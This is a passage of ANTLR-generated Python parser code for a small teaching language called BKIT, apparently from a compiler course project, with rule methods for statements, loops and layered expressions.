self.state)\n self.enterRule(localctx, 42, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 307\n self.match(BKITParser.DO)\n self.state = 308\n self.stmt_list()\n self.state = 309\n self.match(BKITParser.WHILE)\n self.state = 310\n self.expr()\n self.state = 311\n self.match(BKITParser.ENDDO)\n self.state = 312\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitAssign_stmt\" ):\n return visitor.visitAssign_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,25,self._ctx)\n if la_ == 1:\n self.state = 314\n self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 315\n self.scalar_var()\n pass\n\n\n self.state = 318\n self.match(BKITParser.ASSIGN)\n\n self.state = 319\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n 
self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitBreak_stmt\" ):\n return visitor.visitBreak_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitContinue_stmt\" ):\n return visitor.visitContinue_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 323\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return 
localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCall_stmt\" ):\n return visitor.visitCall_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_call_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 325\n self.function_call()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitReturn_stmt\" ):\n return visitor.visitReturn_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 327\n self.match(BKITParser.RETURN)\n self.state = 329\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << 
BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 328\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Init_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_init_for\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitInit_for\" ):\n return visitor.visitInit_for(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def init_for(self):\n\n localctx = BKITParser.Init_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_init_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 331\n self.scalar_var()\n self.state = 332\n self.match(BKITParser.ASSIGN)\n self.state = 333\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Con_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return 
BKITParser.RULE_con_for\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCon_for\" ):\n return visitor.visitCon_for(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def con_for(self):\n\n localctx = BKITParser.Con_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_con_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 335\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Update_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_update_for\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitUpdate_for\" ):\n return visitor.visitUpdate_for(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def update_for(self):\n\n localctx = BKITParser.Update_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_update_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 337\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def EQUAL(self):\n return self.getToken(BKITParser.EQUAL, 0)\n\n def 
NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr\" ):\n return visitor.visitExpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_expr)\n self._la = 0 # Token type\n try:\n self.state = 344\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,27,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 339\n self.expr1(0)\n self.state = 340\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n 
self._errHandler.reportMatch(self)\n self.consume()\n self.state = 341\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 343\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr1\" ):\n return visitor.visitExpr1(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 62\n self.enterRecursionRule(localctx, 62, self.RULE_expr1, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 347\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 354\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 349\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import 
FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 350\n _la = self._input.LA(1)\n if not(_la==BKITParser.AND or _la==BKITParser.OR):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 351\n self.expr2(0) \n self.state = 356\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,28,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr2\" ):\n return visitor.visitExpr2(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 64\n self.enterRecursionRule(localctx, 64, self.RULE_expr2, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 358\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 365\n self._errHandler.sync(self)\n 
_alt = self._interp.adaptivePredict(self._input,29,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 360\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 361\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 362\n self.expr3(0) \n self.state = 367\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,29,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def STAR_FLOAT(self):\n return self.getToken(BKITParser.STAR_FLOAT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def getRuleIndex(self):\n return 
BKITParser.RULE_expr3\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr3\" ):\n return visitor.visitExpr3(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 66\n self.enterRecursionRule(localctx, 66, self.RULE_expr3, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 369\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 376\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,30,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 371\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 372\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.STAR_INT) | (1 << BKITParser.STAR_FLOAT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.MOD))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 373\n self.expr4() \n self.state = 378\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,30,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, 
parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr4\" ):\n return visitor.visitExpr4(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_expr4)\n try:\n self.state = 382\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.NOT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 379\n self.match(BKITParser.NOT)\n self.state = 380\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 381\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def 
getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr5\" ):\n return visitor.visitExpr5(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_expr5)\n self._la = 0 # Token type\n try:\n self.state = 387\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 384\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.MINUS_FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 385\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 386\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr6\" ):\n return visitor.visitExpr6(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n 
self.enterRule(localctx, 72, self.RULE_expr6)\n try:\n self.state = 393\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 389\n self.expr7()\n self.state = 390\n self.index_op()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 392\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr7\" ):\n return visitor.visitExpr7(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_expr7)\n try:\n self.state = 397\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,34,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 395\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 396\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, 
invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr8\" ):\n return visitor.visitExpr8(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 76, self.RULE_expr8)\n try:\n self.state = 404\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 399\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 400\n self.match(BKITParser.LEFT_PAREN)\n self.state = 401\n self.expr()\n self.state = 402\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def 
getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitOperand\" ):\n return visitor.visitOperand(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 78, self.RULE_operand)\n try:\n self.state = 409\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 406\n self.var_non_init()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 407\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 408\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, 
